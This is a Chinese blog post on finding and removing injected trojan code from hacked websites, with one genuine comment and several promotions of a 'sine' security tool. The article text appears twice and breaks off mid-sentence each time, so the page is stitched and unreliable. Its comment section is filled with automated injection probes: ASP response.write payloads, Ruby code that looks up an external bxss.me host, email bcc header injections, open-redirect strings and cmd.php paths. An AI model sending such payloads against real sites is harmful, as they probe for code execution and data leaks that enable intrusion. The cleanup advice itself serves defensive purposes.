網站被掛馬 如何處理網站被掛馬很簡單-中國網
網站從創建到現在已經有N年多了,網站被掛馬了,一聽網站掛馬我就懵了,不知所措,以前我真的沒遇到過,也不知道什么是掛馬,在網上搜索了整整3天,終于把網站被掛馬給摸透了,我猜很多像我第一次遇到網站被掛馬的站長一定也很頭疼,不要疼,還有我呢,下面我就給大家談談我是怎么解決網站被掛馬的!
網站被掛馬有什么影響?
網站數量的日益增長,給互聯網增加了許多信息和色彩,對于日益增長的網民來說更是一件好事,但是網站多了卻成了一個一個黑客們的目標,黑客們為了賺錢不惜一切代價,去入侵網站并掛馬,導致互聯網的黑色鏈接越來越豐富,用戶用木馬病毒的也越來越多。影響分兩面,一面是對于用戶的影響,如QQ賬號被盜、游戲帳號被、銀行賬戶被盜,損失是很大的,另一面是對于站長們的影響,網站被掛馬后,搜索引擎會立刻降權,排名都會下降,網站數據也有可能會被竊取并傳播。
網站被掛馬是什么?
很多新手站長不懂什么是掛馬,我就大體的介紹一下:網站被掛馬是指網站被黑客惡意的上傳了木馬,并把惡意的帶病毒的代碼嵌入到網站的首頁或者各個地方,這些掛馬分很多種,有圖片掛馬、框架掛馬、js掛馬、global.asa掛馬、還有IFRAME掛馬,等等。
如何檢測自己的網站是否被掛馬呢?
我在這里給大家說一下我檢測網站被掛馬的方法,首先打開自己的網站然后右鍵查看源代碼,一般掛馬都會掛在首頁代碼的中部或者最底部,看到有一些自己不認識的網站鏈接那一般就是網站被人給掛馬了,另一種檢測方法就是用FTP權限去查看自己的網站程序,看看有沒有自己不熟悉的文件名和js文件,如果有那就是掛馬,再一個就是黑客上傳的腳本木馬一般是30-90KB左右的文件,也可以根據文件大小來判斷,如果你什么都不懂,也可以用sine安全網站被掛馬檢測工具來檢測,我網站用這個工具用了不到5分鐘就很快查出了很多網站木馬代碼。
如何解決網站被掛馬?
上面講了如何檢測掛馬,一般人都能看懂,實在不懂可以用sine安全掛馬檢測工具來檢測那是最簡單不過的了。一般站長碰到網站被掛馬怎么辦呢?首先不要急,網站的程序最重要,要先備份下網站程序和數據庫。然后本地架設環境來清理木馬代碼,千萬不要在FTP上直接操作,那樣會讓你更難處理掛馬。
掛馬的種類很多,上面我已經詳細介紹過了,再實際情況中如果遇到不同種類的掛馬,可以一一對應處理,下面我把我研究的一套掛馬解決方案貢獻出來,希望能幫到大家,我也是站長,網站被掛馬的心情我也知。我也希望你們遇到問題都高高興興的去處理解決。
清馬
1、global.asa 一般是這個文件。刪除就好了。
2、找掛馬的標簽,比如有<script language="javascript" src="網馬地址"></script> 或<iframe width=400 height=350 frameborder=0 scrolling=auto src=網馬地址></iframe>, 有的是框架為0的也是掛馬特征,以上算上掛馬的綜合特征,必須先找到掛馬代碼,然后接下來是處理掛馬。
3、找到了惡意代碼后,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清, 網頁清馬比較簡單,不會的可以用sinesafe掛馬清理工具來處理,現在著重講一下SQL數據庫清馬, 用這一句語句“update 表名set 字段名=replace(字段名,'aaa','')”,
解釋一下這一句子的意思 :把字段名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。 再刪除掛馬之前千萬要備份下數據庫,因為清理木馬的同時也有應如何解決
網站從創建到現在已經有1年多了,一直運行正常,訪問也很穩定,直到昨天一個朋友告訴我說我的網站被掛馬了,當時我一聽網站掛馬我就懵了,不知所措,以前我真的沒遇到過,也不知道什么是掛馬,在網上搜索了整整3天,終于把網站被掛馬給摸透了,我猜很多像我第一次遇到網站被掛馬的站長一定也很頭疼,不要疼,還有我呢,下面我就給大家談談我是怎么解決網站被掛馬的!
網站被掛馬有什么影響?
網站數量的日益增長,給互聯網增加了許多信息和色彩,對于日益增長的網民來說更是一件好事,但是網站多了卻成了一個一個黑客們的目標,黑客們為了賺錢不惜一切代價,去入侵網站并掛馬,導致互聯網的黑色鏈接越來越豐富,用戶用木馬病毒的也越來越多。
影響分兩面,一面是對于用戶的影響,如QQ賬號被盜、游戲帳號被、銀行賬戶被盜,損失是很大的,另一面是對于站長們的影響,網站被掛馬后,搜索引擎會立刻降權,排名都會下降,網站數據也有可能會被竊取并傳播。
網站被掛馬是什么?
很多新手站長不懂什么是掛馬,我就大體的介紹一下:網站被掛馬是指網站被黑客惡意的上傳了木馬,并把惡意的帶病毒的代碼嵌入到網站的首頁或者各個地方,這些掛馬分很多種,有圖片掛馬、框架掛馬、js掛馬、global.asa掛馬、還有IFRAME掛馬,等等。
如何檢測自己的網站是否被掛馬呢?
我在這里給大家說一下我檢測網站被掛馬的方法,首先打開自己的網站然后右鍵查看源代碼,一般掛馬都會掛在首頁代碼的中部或者最底部,看到有一些自己不認識的網站鏈接那一般就是網站被人給掛馬了,另一種檢測方法就是用FTP權限去查看自己的網站程序,看看有沒有自己不熟悉的文件名和js文件,如果有那就是掛馬,再一個就是黑客上傳的腳本木馬一般是30-90KB左右的文件,也可以根據文件大小來判斷,如果你什么都不懂,也可以用sine安全網站被掛馬檢測工具來檢測,我網站用這個工具用了不到5分鐘就很快查出了很多網站木馬代碼。
如何解決網站被掛馬?
上面講了如何檢測掛馬,一般人都能看懂,實在不懂可以用sine安全掛馬檢測工具來檢測那是最簡單不過的了。一般站長碰到網站被掛馬怎么辦呢?首先不要急,網站的程序最重要,要先備份下網站程序和數據庫。然后本地架設環境來清理木馬代碼,千萬不要在FTP上直接操作,那樣會讓你更難處理掛馬。掛馬的種類很多,上面我已經詳細介紹過了,再實際情況中如果遇到不同種類的掛馬,可以一一對應處理,下面我把我研究的一套掛馬解決方案貢獻出來,希望能幫到大家,我也是站長,網站被掛馬的心情我也知。我也希望你們遇到問題都高高興興的去處理解決。
清馬
1、找掛馬的標簽,比如有<script language="javascript" src="網馬地址"></script> 或<iframe width=400 height=350 frameborder=0 scrolling=auto src=網馬地址></iframe>, 有的是框架為0的也是掛馬特征,以上算上掛馬的綜合特征,必須先找到掛馬代碼,然后接下來是處理掛馬。 2、找到了惡意代碼后,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清, 網頁清馬比較簡單,不會的可以用sinesafe掛馬清理工具來處理,現在著重講一下SQL數據庫清馬, 用這一句語句“update 表名set 字段名=replace(字段名,'aaa','')”,解釋一下這一句子的意思 :把字段名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。 再刪除掛馬之前千萬要備份下數據庫,因為清理木馬的同時也有
本文由站長原創或收集,不代表本站立場,如若轉載,請注明出處:http://www.usbitcoinrealestatemarket.com/post/60.html
共有 668 條評論
百度云安全
一旦發現網站有掛馬,泛解析,快照劫持,首頁自動跳轉等情況,檢查看下網站的源代碼,將非網站本身的代碼去除,然后需要修復網站漏洞,不給黑客可乘之機;一般這種情況都是反復性質的被篡改跳轉,清理惡意跳轉代碼后沒過多久就又被篡改了,關于網站的漏洞修復,以及網站安全防護可以找專業的網站安全公司來處理,國內也就SINE安全,綠盟,啟明星辰等安全公司比較專業,然后再修改網站相關的用戶名與密碼,找服務器安全公司加強服務器端的安全設置;通過申訴的方式盡可能減小網站的流量,排名損失。
gBqsPxAZ
1
gBqsPxAZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
cmd.php
HfjNUlYZ
cmd.php
HfjNUlYZ
cmd.php/.
HfjNUlYZ
1
HfjNUlYZ
xfs.bxss.me
HfjNUlYZ
915303
HfjNUlYZ
http://xfs.bxss.me?zhuanyeseo.com
HfjNUlYZ
1
HfjNUlYZ
xfs.bxss.me?zhuanyeseo.com
HfjNUlYZ
1
HfjNUlYZ
//xfs.bxss.me?zhuanyeseo.com
HfjNUlYZ
1
HfjNUlYZ
/\xfs.bxss.me?zhuanyeseo.com
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
response.write(9200903*9788588)
HfjNUlYZ
1
cmd.php
1
HfjNUlYZ
1
xfs.bxss.me
1
HfjNUlYZ
'+response.write(9200903*9788588)+'
HfjNUlYZ
"+"A".concat(70-3).concat(22*4).concat(114).concat(85).concat(118).concat(78)+(require"socket"
Socket.gethostbyname("hitac"+"qxfmqfuv50c5b.bxss.me.")[3].to_s)+"
959348
1
HfjNUlYZ
"+response.write(9200903*9788588)+"
HfjNUlYZ
'+'A'.concat(70-3).concat(22*4).concat(97).concat(85).concat(100).concat(69)+(require'socket'
Socket.gethostbyname('hitew'+'tftzjmti0e654.bxss.me.')[3].to_s)+'
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
H1vaS6u4
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
hCk5FFM6
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
bcc:074625.4000-18395.4000.4e470.19489.2@bxss.me
HfjNUlYZ
1
HfjNUlYZ
to@example.com?
bcc:074625.4000-18396.4000.4e470.19489.2@bxss.me
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1
HfjNUlYZ
1